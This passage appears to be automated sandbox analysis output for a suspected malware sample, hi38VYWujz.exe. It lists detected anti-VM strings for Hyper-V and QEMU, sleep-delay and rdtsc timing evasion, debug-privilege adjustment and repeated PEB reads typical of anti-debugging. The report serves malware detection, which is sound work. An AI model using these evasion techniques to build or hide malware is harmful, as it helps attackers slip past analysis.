Source: hi38VYWujz.exe, 00000006.00000002.45135278512.0000000000908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\explorer.exe TID: 540	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 540	Thread sleep time: -62000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 880	Thread sleep count: 115 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 880	Thread sleep time: -230000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 11_2_36B21763 rdtsc

11_2_36B21763

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 865			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877			Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe

API coverage: 1.0 %

Source: C:\Windows\SysWOW64\cscript.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_0040596D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_004065A2 FindFirstFileW,FindClose,	6_2_004065A2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_00402862 FindFirstFileW,	6_2_00402862

Source: C:\Users\user\Desktop\hi38VYWujz.exe	API call chain: ExitProcess graph end node			graph_6-4537
Source: C:\Users\user\Desktop\hi38VYWujz.exe	API call chain: ExitProcess graph end node			graph_6-4542

Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: hi38VYWujz.exe, 0000000B.00000003.45078369895.0000000006915000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45264895443.0000000006915000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: hi38VYWujz.exe, 0000000B.00000003.45078369895.0000000006915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: hi38VYWujz.exe, 00000006.00000002.45232046783.0000000007F30000.00000004.00001000.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45264868800.00000000068A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: hi38VYWujz.exe, 00000006.00000002.45135278512.0000000000908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: hi38VYWujz.exe, 00000006.00000002.45232661179.0000000010059000.00000004.00000800.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: hi38VYWujz.exe, 00000006.00000002.45135278512.0000000000908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeamRcP
Source: hi38VYWujz.exe, 0000000B.00000002.45266443506.00000000082C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

6_2_10001B18

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 11_2_36B21763 rdtsc

11_2_36B21763

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA86A8 mov eax, dword ptr fs:[00000030h]	11_2_36BA86A8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA86A8 mov eax, dword ptr fs:[00000030h]	11_2_36BA86A8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6C691 mov eax, dword ptr fs:[00000030h]	11_2_36B6C691
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5D69D mov eax, dword ptr fs:[00000030h]	11_2_36B5D69D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680 mov eax, dword ptr fs:[00000030h]	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F68C mov eax, dword ptr fs:[00000030h]	11_2_36B9F68C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE8690 mov eax, dword ptr fs:[00000030h]	11_2_36AE8690
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5C6F2 mov eax, dword ptr fs:[00000030h]	11_2_36B5C6F2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5C6F2 mov eax, dword ptr fs:[00000030h]	11_2_36B5C6F2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD96E0 mov eax, dword ptr fs:[00000030h]	11_2_36AD96E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD96E0 mov eax, dword ptr fs:[00000030h]	11_2_36AD96E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEC6E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEC6E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE56E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE56E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE56E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE56E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE56E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE56E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B066E0 mov eax, dword ptr fs:[00000030h]	11_2_36B066E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B066E0 mov eax, dword ptr fs:[00000030h]	11_2_36B066E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0D6D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0D6D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE06CF mov eax, dword ptr fs:[00000030h]	11_2_36AE06CF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAA6C0 mov eax, dword ptr fs:[00000030h]	11_2_36BAA6C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B10630 mov eax, dword ptr fs:[00000030h]	11_2_36B10630
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B68633 mov esi, dword ptr fs:[00000030h]	11_2_36B68633
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B68633 mov eax, dword ptr fs:[00000030h]	11_2_36B68633
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B68633 mov eax, dword ptr fs:[00000030h]	11_2_36B68633
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE5622 mov eax, dword ptr fs:[00000030h]	11_2_36AE5622
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE5622 mov eax, dword ptr fs:[00000030h]	11_2_36AE5622
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE7623 mov eax, dword ptr fs:[00000030h]	11_2_36AE7623
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1F63F mov eax, dword ptr fs:[00000030h]	11_2_36B1F63F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1F63F mov eax, dword ptr fs:[00000030h]	11_2_36B1F63F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1C620 mov eax, dword ptr fs:[00000030h]	11_2_36B1C620
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8D62C mov ecx, dword ptr fs:[00000030h]	11_2_36B8D62C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8D62C mov ecx, dword ptr fs:[00000030h]	11_2_36B8D62C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8D62C mov eax, dword ptr fs:[00000030h]	11_2_36B8D62C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE0630 mov eax, dword ptr fs:[00000030h]	11_2_36AE0630
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0D600 mov eax, dword ptr fs:[00000030h]	11_2_36B0D600
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0D600 mov eax, dword ptr fs:[00000030h]	11_2_36B0D600
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B69603 mov eax, dword ptr fs:[00000030h]	11_2_36B69603
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4600 mov eax, dword ptr fs:[00000030h]	11_2_36BB4600
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F607 mov eax, dword ptr fs:[00000030h]	11_2_36B9F607
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1360F mov eax, dword ptr fs:[00000030h]	11_2_36B1360F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B73608 mov eax, dword ptr fs:[00000030h]	11_2_36B73608
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B73608 mov eax, dword ptr fs:[00000030h]	11_2_36B73608
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B73608 mov eax, dword ptr fs:[00000030h]	11_2_36B73608
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B73608 mov eax, dword ptr fs:[00000030h]	11_2_36B73608
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B73608 mov eax, dword ptr fs:[00000030h]	11_2_36B73608
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B73608 mov eax, dword ptr fs:[00000030h]	11_2_36B73608
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22670 mov eax, dword ptr fs:[00000030h]	11_2_36B22670
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22670 mov eax, dword ptr fs:[00000030h]	11_2_36B22670
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF3660 mov eax, dword ptr fs:[00000030h]	11_2_36AF3660
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF3660 mov eax, dword ptr fs:[00000030h]	11_2_36AF3660
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF3660 mov eax, dword ptr fs:[00000030h]	11_2_36AF3660
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD7662 mov eax, dword ptr fs:[00000030h]	11_2_36AD7662
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD7662 mov eax, dword ptr fs:[00000030h]	11_2_36AD7662
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD7662 mov eax, dword ptr fs:[00000030h]	11_2_36AD7662
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6166E mov eax, dword ptr fs:[00000030h]	11_2_36B6166E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6166E mov eax, dword ptr fs:[00000030h]	11_2_36B6166E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6166E mov eax, dword ptr fs:[00000030h]	11_2_36B6166E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1666D mov esi, dword ptr fs:[00000030h]	11_2_36B1666D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1666D mov eax, dword ptr fs:[00000030h]	11_2_36B1666D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1666D mov eax, dword ptr fs:[00000030h]	11_2_36B1666D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE0670 mov eax, dword ptr fs:[00000030h]	11_2_36AE0670
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B15654 mov eax, dword ptr fs:[00000030h]	11_2_36B15654
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADD64A mov eax, dword ptr fs:[00000030h]	11_2_36ADD64A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADD64A mov eax, dword ptr fs:[00000030h]	11_2_36ADD64A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1265C mov eax, dword ptr fs:[00000030h]	11_2_36B1265C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1265C mov ecx, dword ptr fs:[00000030h]	11_2_36B1265C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1265C mov eax, dword ptr fs:[00000030h]	11_2_36B1265C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE3640 mov eax, dword ptr fs:[00000030h]	11_2_36AE3640
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF640 mov eax, dword ptr fs:[00000030h]	11_2_36AFF640
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF640 mov eax, dword ptr fs:[00000030h]	11_2_36AFF640
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF640 mov eax, dword ptr fs:[00000030h]	11_2_36AFF640
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1C640 mov eax, dword ptr fs:[00000030h]	11_2_36B1C640
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1C640 mov eax, dword ptr fs:[00000030h]	11_2_36B1C640
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB17BC mov eax, dword ptr fs:[00000030h]	11_2_36BB17BC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE07A7 mov eax, dword ptr fs:[00000030h]	11_2_36AE07A7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAD7A7 mov eax, dword ptr fs:[00000030h]	11_2_36BAD7A7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAD7A7 mov eax, dword ptr fs:[00000030h]	11_2_36BAD7A7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAD7A7 mov eax, dword ptr fs:[00000030h]	11_2_36BAD7A7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B11796 mov eax, dword ptr fs:[00000030h]	11_2_36B11796
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B11796 mov eax, dword ptr fs:[00000030h]	11_2_36B11796
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E79D mov eax, dword ptr fs:[00000030h]	11_2_36B5E79D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB781 mov eax, dword ptr fs:[00000030h]	11_2_36BBB781
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB781 mov eax, dword ptr fs:[00000030h]	11_2_36BBB781
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE37E4 mov eax, dword ptr fs:[00000030h]	11_2_36AE37E4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E7E0 mov eax, dword ptr fs:[00000030h]	11_2_36B0E7E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE77F9 mov eax, dword ptr fs:[00000030h]	11_2_36AE77F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE77F9 mov eax, dword ptr fs:[00000030h]	11_2_36AE77F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F7CF mov eax, dword ptr fs:[00000030h]	11_2_36B9F7CF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE3722 mov eax, dword ptr fs:[00000030h]	11_2_36AE3722
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE3722 mov eax, dword ptr fs:[00000030h]	11_2_36AE3722
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B09723 mov eax, dword ptr fs:[00000030h]	11_2_36B09723
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB705 mov eax, dword ptr fs:[00000030h]	11_2_36ADB705
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB705 mov eax, dword ptr fs:[00000030h]	11_2_36ADB705
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB705 mov eax, dword ptr fs:[00000030h]	11_2_36ADB705
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB705 mov eax, dword ptr fs:[00000030h]	11_2_36ADB705
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED700 mov ecx, dword ptr fs:[00000030h]	11_2_36AED700
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F717 mov eax, dword ptr fs:[00000030h]	11_2_36B9F717
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA970B mov eax, dword ptr fs:[00000030h]	11_2_36BA970B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA970B mov eax, dword ptr fs:[00000030h]	11_2_36BA970B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE471B mov eax, dword ptr fs:[00000030h]	11_2_36AE471B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE471B mov eax, dword ptr fs:[00000030h]	11_2_36AE471B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0270D mov eax, dword ptr fs:[00000030h]	11_2_36B0270D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0270D mov eax, dword ptr fs:[00000030h]	11_2_36B0270D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0270D mov eax, dword ptr fs:[00000030h]	11_2_36B0270D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B10774 mov eax, dword ptr fs:[00000030h]	11_2_36B10774
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF2760 mov ecx, dword ptr fs:[00000030h]	11_2_36AF2760
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21763 mov eax, dword ptr fs:[00000030h]	11_2_36B21763
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21763 mov eax, dword ptr fs:[00000030h]	11_2_36B21763
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21763 mov eax, dword ptr fs:[00000030h]	11_2_36B21763
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21763 mov eax, dword ptr fs:[00000030h]	11_2_36B21763
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21763 mov eax, dword ptr fs:[00000030h]	11_2_36B21763
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21763 mov eax, dword ptr fs:[00000030h]	11_2_36B21763
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE4779 mov eax, dword ptr fs:[00000030h]	11_2_36AE4779
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE4779 mov eax, dword ptr fs:[00000030h]	11_2_36AE4779
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A750 mov eax, dword ptr fs:[00000030h]	11_2_36B1A750
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02755 mov eax, dword ptr fs:[00000030h]	11_2_36B02755
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02755 mov eax, dword ptr fs:[00000030h]	11_2_36B02755
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02755 mov eax, dword ptr fs:[00000030h]	11_2_36B02755
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02755 mov ecx, dword ptr fs:[00000030h]	11_2_36B02755
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02755 mov eax, dword ptr fs:[00000030h]	11_2_36B02755
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02755 mov eax, dword ptr fs:[00000030h]	11_2_36B02755
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8E750 mov eax, dword ptr fs:[00000030h]	11_2_36B8E750
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B13740 mov eax, dword ptr fs:[00000030h]	11_2_36B13740
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF75B mov eax, dword ptr fs:[00000030h]	11_2_36ADF75B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1174A mov eax, dword ptr fs:[00000030h]	11_2_36B1174A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6174B mov eax, dword ptr fs:[00000030h]	11_2_36B6174B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6174B mov ecx, dword ptr fs:[00000030h]	11_2_36B6174B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE24A2 mov eax, dword ptr fs:[00000030h]	11_2_36AE24A2
